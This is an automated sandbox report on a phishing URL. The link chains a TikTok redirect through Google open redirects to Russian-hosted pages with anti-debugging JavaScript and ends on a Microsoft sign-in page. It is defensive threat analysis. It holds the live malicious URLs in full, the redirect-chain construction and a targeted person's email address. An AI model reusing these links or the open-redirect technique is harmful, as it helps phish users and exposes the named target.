Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://www.tiktok.com/link/v2?aid=1988&lang=en&scene=bio_url&target=https%3A%2F%2Fgoogle.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%253Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3D.%2F%2F%2F%2Famp%2Fs%2Filikethislife.com%2Fwinner%2F0SfNj%2FY2N1ZGR5c

Overview

General Information

Sample URL:https://www.tiktok.com/link/v2?aid=1988&lang=en&scene=bio_url&target=https%3A%2F%2Fgoogle.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%253Dhttps%3A%2
Analysis ID:1590299
Infos:

Detection

Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
AI detected suspicious Javascript
Detected non-DNS traffic on DNS port
Detected suspicious crossdomain redirect
HTML body contains low number of good links
HTML page contains hidden javascript code
HTML title does not match URL

Classification

  • System is w10x64
  • chrome.exe (PID: 2756 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 5480 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2408 --field-trial-handle=2368,i,15692943179016407377,4443873217804746429,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6580 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.tiktok.com/link/v2?aid=1988&lang=en&scene=bio_url&target=https%3A%2F%2Fgoogle.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%253Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3D.%2F%2F%2F%2Famp%2Fs%2Filikethislife.com%2Fwinner%2F0SfNj%2FY2N1ZGR5cmVAc3lmdGNvLmNvbQ==?0s57db=MTMmMTMmMTMmMTMmQjEmRjQmb2JxdEczJkQ0Jk11bHdyVGhHeUtZLi45SjNYNlJyamY6ckY0JjMzJnV5ZnUub2ZlZWppMzMmRTQmdHRibWQxMyZvYnF0RDQmQjEmRjQmbW51aUczJkQ0JkIxJkY0JnplcGNHMyZENCZCMSZGNCZ6ZXBjRDQmQjEmRjQmZWJmaUczJkQ0JkIxJkY0JmZtenV0RzMmRDQmMTMmMTMmMTMmMTMmQjEmRTgmMTMmMTMmMTMmMTMmMTMmMTMmMTMmMTMmQjEmQzQmb2ZlZWppMTMmQjQmenVqbWpjanRqdzEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJkIxJkM0JmZ1aml4MTMmQjQmc3BtcGQxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZDOCYxMyZ1eWZ1Lm9mZWVqaS8xMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZGNCZmbXp1dEQ0JjEzJjEzJjEzJjEzJkIxJkY0JmZtdWp1RzMmRDQmZm5wSUY0JmZtdWp1RDQmMTMmMTMmMTMmMTMmQjEmRzMmKzEzJmZzMTMmZWViMTMmRTQmRTQmRTQmRTQmRTQmRTQmRDQmMTMmK0czJjEzJjEzJkY0JjMzJkI6NjMmMTk2MyYzRjYzJkRCNjMmMzk2MyYzRjYzJjRCNjMmNEQ2MyY1MyY1MyZCOjYzJjE5NjMmM0Y2MyZEQjYzJjM5NjMmM0Y2MyY0QjYzJjRENjMmRTQmRTQmeGN6Nnpka21IZXtHSGN4MlRaelM0Wm1HSFJpT1hidkdIZXs2VFp2R25bbVM0ZEczJkROUEVHMyZ6ZndzdnR0c2Z6YkczJmx2L3BkL3pmd3N2dHRzZnpiRzMmRzMmQjQmdHF1dWlFNCZtc3ZDNCYzMzMmRTQmdW9mdW9wZDEzJjMzJml0ZnNnZnMzMyZFNCZ3anZyZi5xdXVpMTMmYnVmbkQ0JjEzJjEzJjEzJjEzJkIxJkY0JjMzJjkuR1VWMzMmRTQmdWZ0c2JpZDEzJmJ1Zm5ENCYxMyYxMyYxMyYxMyZCMSZGNCZlYmZpRDQmQjEmRjQmbW51aUQ0JkIxJkY0Jm9icXRHMyZENCZkazdoWlZENCZ0ezVNRTQmTFhteDFPUWdkWFBZc3s1d0c5e1FFNiZDT0Y0JjMzJnV5ZnUub2ZlZWppMzMmRTQmdHRibWQxMyZvYnF0RDQmQjEm" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://rfll.yordickyel.ru/favicon.icoAvira URL Cloud: Label: phishing
Source: https://rfll.yordickyel.ru/16E/Avira URL Cloud: Label: phishing
Source: https://votcsygtms0fxymxuiwkkjlrgdrdqvm6ovda6twx3bjts5vu90kea.chiblaispi.ru/aqqmwlrvqzcwktvkpopvdsikJKPNGuiDBESTWYJSWBJUHBXABLMDADRMWZMKQAOEJQRIYUKFBAXNZRUAvira URL Cloud: Label: malware

Phishing

barindex
Source: 1.0.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://rfll.yordickyel.ru/16E/#Mccuddyre@syftco.c... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. The use of obfuscated code and the presence of anti-debugging techniques further increase the risk. Overall, this script demonstrates a high likelihood of malicious intent and should be treated with caution.
Source: 1.2.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://rfll.yordickyel.ru/16E/#Mccuddyre@syftco.c... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. The use of obfuscated URLs and the interaction with an unknown domain 'chiblaispi.ru' further increase the risk. While the script may have some legitimate functionality, the overall behavior is highly suspicious and indicative of potential malicious intent.
Source: 1.1.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://rfll.yordickyel.ru/16E/#Mccuddyre@syftco.c... This script exhibits several high-risk behaviors, including detecting the presence of web automation tools, disabling common browser debugging and developer tools, and redirecting the user to a suspicious domain (login.microsoftonline.com). The script also uses obfuscated variable names and setInterval to repeatedly trigger a debugger statement, which could be an attempt to detect and evade analysis. These behaviors strongly suggest malicious intent, likely for the purpose of phishing or other malicious activities.
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724019630993083.ZWExMjFjNGEtZTVkOS00MTNiLWE3NzEtZmMxODkwNWFiMWE4ZTVjZmZhZjAtZTRmYy00NDA2LTlmODQtYWZlMmEyOTJmNDcx&ui_locales=en-US&mkt=en-US&client-request-id=e8ccec18-0850-4901-a2cd-3752b4f2b0af&state=gIdhYVFUJ0CJU0LJ--eqZqaTi_R2TdPt_fjXEZYH9gimqJpqsn0sBX1ln8U--HEPgVUMNMr2w8ul-afyeB-vLyEzKFjRnk_Em_Zvu3NKYguM6KTK1Y6hcn1JzUSyEC9ptelii0woPjLv5agXGymGu7EasMG56a4rqDmzw_Fsuc_9i54EPOqdsOSATqeEuUQ68MXjc0Wa_AlqAiKVwNgbMxoFqXhvlpA68rXV2bvjU86daz47xIeae_cK-Htci6UaUCxDuWTLNYB5j9YWA4-idg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Number of links: 0
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724019630993083.ZWExMjFjNGEtZTVkOS00MTNiLWE3NzEtZmMxODkwNWFiMWE4ZTVjZmZhZjAtZTRmYy00NDA2LTlmODQtYWZlMmEyOTJmNDcx&ui_locales=en-US&mkt=en-US&client-request-id=e8ccec18-0850-4901-a2cd-3752b4f2b0af&state=gIdhYVFUJ0CJU0LJ--eqZqaTi_R2TdPt_fjXEZYH9gimqJpqsn0sBX1ln8U--HEPgVUMNMr2w8ul-afyeB-vLyEzKFjRnk_Em_Zvu3NKYguM6KTK1Y6hcn1JzUSyEC9ptelii0woPjLv5agXGymGu7EasMG56a4rqDmzw_Fsuc_9i54EPOqdsOSATqeEuUQ68MXjc0Wa_AlqAiKVwNgbMxoFqXhvlpA68rXV2bvjU86daz47xIeae_cK-Htci6UaUCxDuWTLNYB5j9YWA4-idg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: Number of links: 0
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724019630993083.ZWExMjFjNGEtZTVkOS00MTNiLWE3NzEtZmMxODkwNWFiMWE4ZTVjZmZhZjAtZTRmYy00NDA2LTlmODQtYWZlMmEyOTJmNDcx&ui_locales=en-US&mkt=en-US&client-request-id=e8ccec18-0850-4901-a2cd-3752b4f2b0af&state=gIdhYVFUJ0CJU0LJ--eqZqaTi_R2TdPt_fjXEZYH9gimqJpqsn0sBX1ln8U--HEPgVUMNMr2w8ul-afyeB-vLyEzKFjRnk_Em_Zvu3NKYguM6KTK1Y6hcn1JzUSyEC9ptelii0woPjLv5agXGymGu7EasMG56a4rqDmzw_Fsuc_9i54EPOqdsOSATqeEuUQ68MXjc0Wa_AlqAiKVwNgbMxoFqXhvlpA68rXV2bvjU86daz47xIeae_cK-Htci6UaUCxDuWTLNYB5j9YWA4-idg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Base64 decoded: ea121c4a-e5d9-413b-a771-fc18905ab1a8e5cffaf0-e4fc-4406-9f84-afe2a292f471
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724019630993083.ZWExMjFjNGEtZTVkOS00MTNiLWE3NzEtZmMxODkwNWFiMWE4ZTVjZmZhZjAtZTRmYy00NDA2LTlmODQtYWZlMmEyOTJmNDcx&ui_locales=en-US&mkt=en-US&client-request-id=e8ccec18-0850-4901-a2cd-3752b4f2b0af&state=gIdhYVFUJ0CJU0LJ--eqZqaTi_R2TdPt_fjXEZYH9gimqJpqsn0sBX1ln8U--HEPgVUMNMr2w8ul-afyeB-vLyEzKFjRnk_Em_Zvu3NKYguM6KTK1Y6hcn1JzUSyEC9ptelii0woPjLv5agXGymGu7EasMG56a4rqDmzw_Fsuc_9i54EPOqdsOSATqeEuUQ68MXjc0Wa_AlqAiKVwNgbMxoFqXhvlpA68rXV2bvjU86daz47xIeae_cK-Htci6UaUCxDuWTLNYB5j9YWA4-idg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Title: Redirecting does not match URL
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724019630993083.ZWExMjFjNGEtZTVkOS00MTNiLWE3NzEtZmMxODkwNWFiMWE4ZTVjZmZhZjAtZTRmYy00NDA2LTlmODQtYWZlMmEyOTJmNDcx&ui_locales=en-US&mkt=en-US&client-request-id=e8ccec18-0850-4901-a2cd-3752b4f2b0af&state=gIdhYVFUJ0CJU0LJ--eqZqaTi_R2TdPt_fjXEZYH9gimqJpqsn0sBX1ln8U--HEPgVUMNMr2w8ul-afyeB-vLyEzKFjRnk_Em_Zvu3NKYguM6KTK1Y6hcn1JzUSyEC9ptelii0woPjLv5agXGymGu7EasMG56a4rqDmzw_Fsuc_9i54EPOqdsOSATqeEuUQ68MXjc0Wa_AlqAiKVwNgbMxoFqXhvlpA68rXV2bvjU86daz47xIeae_cK-Htci6UaUCxDuWTLNYB5j9YWA4-idg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: Title: Sign in to your account does not match URL
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724019630993083.ZWExMjFjNGEtZTVkOS00MTNiLWE3NzEtZmMxODkwNWFiMWE4ZTVjZmZhZjAtZTRmYy00NDA2LTlmODQtYWZlMmEyOTJmNDcx&ui_locales=en-US&mkt=en-US&client-request-id=e8ccec18-0850-4901-a2cd-3752b4f2b0af&state=gIdhYVFUJ0CJU0LJ--eqZqaTi_R2TdPt_fjXEZYH9gimqJpqsn0sBX1ln8U--HEPgVUMNMr2w8ul-afyeB-vLyEzKFjRnk_Em_Zvu3NKYguM6KTK1Y6hcn1JzUSyEC9ptelii0woPjLv5agXGymGu7EasMG56a4rqDmzw_Fsuc_9i54EPOqdsOSATqeEuUQ68MXjc0Wa_AlqAiKVwNgbMxoFqXhvlpA68rXV2bvjU86daz47xIeae_cK-Htci6UaUCxDuWTLNYB5j9YWA4-idg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: <input type="password" .../> found
Source: https://rfll.yordickyel.ru/16E/#Mccuddyre@syftco.comHTTP Parser: No favicon
Source: https://rfll.yordickyel.ru/16E/#Mccuddyre@syftco.comHTTP Parser: No favicon
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724019630993083.ZWExMjFjNGEtZTVkOS00MTNiLWE3NzEtZmMxODkwNWFiMWE4ZTVjZmZhZjAtZTRmYy00NDA2LTlmODQtYWZlMmEyOTJmNDcx&ui_locales=en-US&mkt=en-US&client-request-id=e8ccec18-0850-4901-a2cd-3752b4f2b0af&state=gIdhYVFUJ0CJU0LJ--eqZqaTi_R2TdPt_fjXEZYH9gimqJpqsn0sBX1ln8U--HEPgVUMNMr2w8ul-afyeB-vLyEzKFjRnk_Em_Zvu3NKYguM6KTK1Y6hcn1JzUSyEC9ptelii0woPjLv5agXGymGu7EasMG56a4rqDmzw_Fsuc_9i54EPOqdsOSATqeEuUQ68MXjc0Wa_AlqAiKVwNgbMxoFqXhvlpA68rXV2bvjU86daz47xIeae_cK-Htci6UaUCxDuWTLNYB5j9YWA4-idg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No favicon
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724019630993083.ZWExMjFjNGEtZTVkOS00MTNiLWE3NzEtZmMxODkwNWFiMWE4ZTVjZmZhZjAtZTRmYy00NDA2LTlmODQtYWZlMmEyOTJmNDcx&ui_locales=en-US&mkt=en-US&client-request-id=e8ccec18-0850-4901-a2cd-3752b4f2b0af&state=gIdhYVFUJ0CJU0LJ--eqZqaTi_R2TdPt_fjXEZYH9gimqJpqsn0sBX1ln8U--HEPgVUMNMr2w8ul-afyeB-vLyEzKFjRnk_Em_Zvu3NKYguM6KTK1Y6hcn1JzUSyEC9ptelii0woPjLv5agXGymGu7EasMG56a4rqDmzw_Fsuc_9i54EPOqdsOSATqeEuUQ68MXjc0Wa_AlqAiKVwNgbMxoFqXhvlpA68rXV2bvjU86daz47xIeae_cK-Htci6UaUCxDuWTLNYB5j9YWA4-idg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724019630993083.ZWExMjFjNGEtZTVkOS00MTNiLWE3NzEtZmMxODkwNWFiMWE4ZTVjZmZhZjAtZTRmYy00NDA2LTlmODQtYWZlMmEyOTJmNDcx&ui_locales=en-US&mkt=en-US&client-request-id=e8ccec18-0850-4901-a2cd-3752b4f2b0af&state=gIdhYVFUJ0CJU0LJ--eqZqaTi_R2TdPt_fjXEZYH9gimqJpqsn0sBX1ln8U--HEPgVUMNMr2w8ul-afyeB-vLyEzKFjRnk_Em_Zvu3NKYguM6KTK1Y6hcn1JzUSyEC9ptelii0woPjLv5agXGymGu7EasMG56a4rqDmzw_Fsuc_9i54EPOqdsOSATqeEuUQ68MXjc0Wa_AlqAiKVwNgbMxoFqXhvlpA68rXV2bvjU86daz47xIeae_cK-Htci6UaUCxDuWTLNYB5j9YWA4-idg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724019630993083.ZWExMjFjNGEtZTVkOS00MTNiLWE3NzEtZmMxODkwNWFiMWE4ZTVjZmZhZjAtZTRmYy00NDA2LTlmODQtYWZlMmEyOTJmNDcx&ui_locales=en-US&mkt=en-US&client-request-id=e8ccec18-0850-4901-a2cd-3752b4f2b0af&state=gIdhYVFUJ0CJU0LJ--eqZqaTi_R2TdPt_fjXEZYH9gimqJpqsn0sBX1ln8U--HEPgVUMNMr2w8ul-afyeB-vLyEzKFjRnk_Em_Zvu3NKYguM6KTK1Y6hcn1JzUSyEC9ptelii0woPjLv5agXGymGu7EasMG56a4rqDmzw_Fsuc_9i54EPOqdsOSATqeEuUQ68MXjc0Wa_AlqAiKVwNgbMxoFqXhvlpA68rXV2bvjU86daz47xIeae_cK-Htci6UaUCxDuWTLNYB5j9YWA4-idg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724019630993083.ZWExMjFjNGEtZTVkOS00MTNiLWE3NzEtZmMxODkwNWFiMWE4ZTVjZmZhZjAtZTRmYy00NDA2LTlmODQtYWZlMmEyOTJmNDcx&ui_locales=en-US&mkt=en-US&client-request-id=e8ccec18-0850-4901-a2cd-3752b4f2b0af&state=gIdhYVFUJ0CJU0LJ--eqZqaTi_R2TdPt_fjXEZYH9gimqJpqsn0sBX1ln8U--HEPgVUMNMr2w8ul-afyeB-vLyEzKFjRnk_Em_Zvu3NKYguM6KTK1Y6hcn1JzUSyEC9ptelii0woPjLv5agXGymGu7EasMG56a4rqDmzw_Fsuc_9i54EPOqdsOSATqeEuUQ68MXjc0Wa_AlqAiKVwNgbMxoFqXhvlpA68rXV2bvjU86daz47xIeae_cK-Htci6UaUCxDuWTLNYB5j9YWA4-idg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724019630993083.ZWExMjFjNGEtZTVkOS00MTNiLWE3NzEtZmMxODkwNWFiMWE4ZTVjZmZhZjAtZTRmYy00NDA2LTlmODQtYWZlMmEyOTJmNDcx&ui_locales=en-US&mkt=en-US&client-request-id=e8ccec18-0850-4901-a2cd-3752b4f2b0af&state=gIdhYVFUJ0CJU0LJ--eqZqaTi_R2TdPt_fjXEZYH9gimqJpqsn0sBX1ln8U--HEPgVUMNMr2w8ul-afyeB-vLyEzKFjRnk_Em_Zvu3NKYguM6KTK1Y6hcn1JzUSyEC9ptelii0woPjLv5agXGymGu7EasMG56a4rqDmzw_Fsuc_9i54EPOqdsOSATqeEuUQ68MXjc0Wa_AlqAiKVwNgbMxoFqXhvlpA68rXV2bvjU86daz47xIeae_cK-Htci6UaUCxDuWTLNYB5j9YWA4-idg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724019630993083.ZWExMjFjNGEtZTVkOS00MTNiLWE3NzEtZmMxODkwNWFiMWE4ZTVjZmZhZjAtZTRmYy00NDA2LTlmODQtYWZlMmEyOTJmNDcx&ui_locales=en-US&mkt=en-US&client-request-id=e8ccec18-0850-4901-a2cd-3752b4f2b0af&state=gIdhYVFUJ0CJU0LJ--eqZqaTi_R2TdPt_fjXEZYH9gimqJpqsn0sBX1ln8U--HEPgVUMNMr2w8ul-afyeB-vLyEzKFjRnk_Em_Zvu3NKYguM6KTK1Y6hcn1JzUSyEC9ptelii0woPjLv5agXGymGu7EasMG56a4rqDmzw_Fsuc_9i54EPOqdsOSATqeEuUQ68MXjc0Wa_AlqAiKVwNgbMxoFqXhvlpA68rXV2bvjU86daz47xIeae_cK-Htci6UaUCxDuWTLNYB5j9YWA4-idg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724019630993083.ZWExMjFjNGEtZTVkOS00MTNiLWE3NzEtZmMxODkwNWFiMWE4ZTVjZmZhZjAtZTRmYy00NDA2LTlmODQtYWZlMmEyOTJmNDcx&ui_locales=en-US&mkt=en-US&client-request-id=e8ccec18-0850-4901-a2cd-3752b4f2b0af&state=gIdhYVFUJ0CJU0LJ--eqZqaTi_R2TdPt_fjXEZYH9gimqJpqsn0sBX1ln8U--HEPgVUMNMr2w8ul-afyeB-vLyEzKFjRnk_Em_Zvu3NKYguM6KTK1Y6hcn1JzUSyEC9ptelii0woPjLv5agXGymGu7EasMG56a4rqDmzw_Fsuc_9i54EPOqdsOSATqeEuUQ68MXjc0Wa_AlqAiKVwNgbMxoFqXhvlpA68rXV2bvjU86daz47xIeae_cK-Htci6UaUCxDuWTLNYB5j9YWA4-idg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724019630993083.ZWExMjFjNGEtZTVkOS00MTNiLWE3NzEtZmMxODkwNWFiMWE4ZTVjZmZhZjAtZTRmYy00NDA2LTlmODQtYWZlMmEyOTJmNDcx&ui_locales=en-US&mkt=en-US&client-request-id=e8ccec18-0850-4901-a2cd-3752b4f2b0af&state=gIdhYVFUJ0CJU0LJ--eqZqaTi_R2TdPt_fjXEZYH9gimqJpqsn0sBX1ln8U--HEPgVUMNMr2w8ul-afyeB-vLyEzKFjRnk_Em_Zvu3NKYguM6KTK1Y6hcn1JzUSyEC9ptelii0woPjLv5agXGymGu7EasMG56a4rqDmzw_Fsuc_9i54EPOqdsOSATqeEuUQ68MXjc0Wa_AlqAiKVwNgbMxoFqXhvlpA68rXV2bvjU86daz47xIeae_cK-Htci6UaUCxDuWTLNYB5j9YWA4-idg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
Source: global trafficTCP traffic: 192.168.2.4:49969 -> 1.1.1.1:53
Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: www.google.com to https://ilikethislife.com/winner/0sfnj/y2n1zgr5cmvac3lmdgnvlmnvbq==
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknownTCP traffic detected without corresponding DNS query: 2.16.168.117
Source: unknownTCP traffic detected without corresponding DNS query: 2.16.168.117
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
